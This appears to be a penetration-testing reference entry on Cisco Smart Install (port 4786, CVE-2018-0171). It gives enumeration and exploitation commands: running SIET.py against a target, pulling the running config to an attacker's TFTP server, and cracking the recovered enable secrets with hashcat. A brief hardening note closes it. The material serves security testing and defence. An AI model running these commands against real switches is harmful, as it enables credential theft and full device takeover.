Cisco Smart Install
aka smi, smart-install
Cisco's zero-touch switch provisioning on 4786, enabled by default and unauthenticated. An attacker can pull the running config (creds, SNMP strings) or push a new one — full device takeover (CVE-2018-0171).
Ports
| Port | Proto | Notes |
|---|---|---|
4786 | tcp | Cisco Smart Install |
Fingerprint
- nmap shows 4786/tcp open on a Cisco switch
- SMI director/client handshake responds
Key files
| Path | Holds | Sensitive |
|---|---|---|
running-config (TFTP exfil) | enable/secret hashes, SNMP communities, VTY creds | sensitive |
Known CVEs
| CVE | Impact |
|---|---|
| CVE-2018-0171 | Smart Install remote code execution / config overwrite |
Exploitation primitives
- Unauthenticated: copy the running-config off the switch to your TFTP server
- Config leaks type-7/MD5 enable secrets and SNMP strings → crack/reuse
- Push a malicious config or trigger RCE (CVE-2018-0171)
Overview
Smart Install on 4786 auto-provisions Cisco switches and needs no authentication. The classic move is exfiltrating the running config, which hands you device credentials and SNMP strings.
Enumeration
Confirm SMI is open:
nmap -p4786 <TARGET>Test with the Smart Install Exploitation Tool:
python SIET.py -t <TARGET>Grab the running config
Start a local TFTP server, then have the switch copy its config to you:
python SIET.py -g -t <TARGET>Crack the recovered secrets offline (Cisco type-7 / type-5):
hashcat -m 500 enable_secret.txt /usr/share/wordlists/rockyou.txtHardening
Disable Smart Install (no vstack) on production switches and block 4786 at the boundary; patch CVE-2018-0171.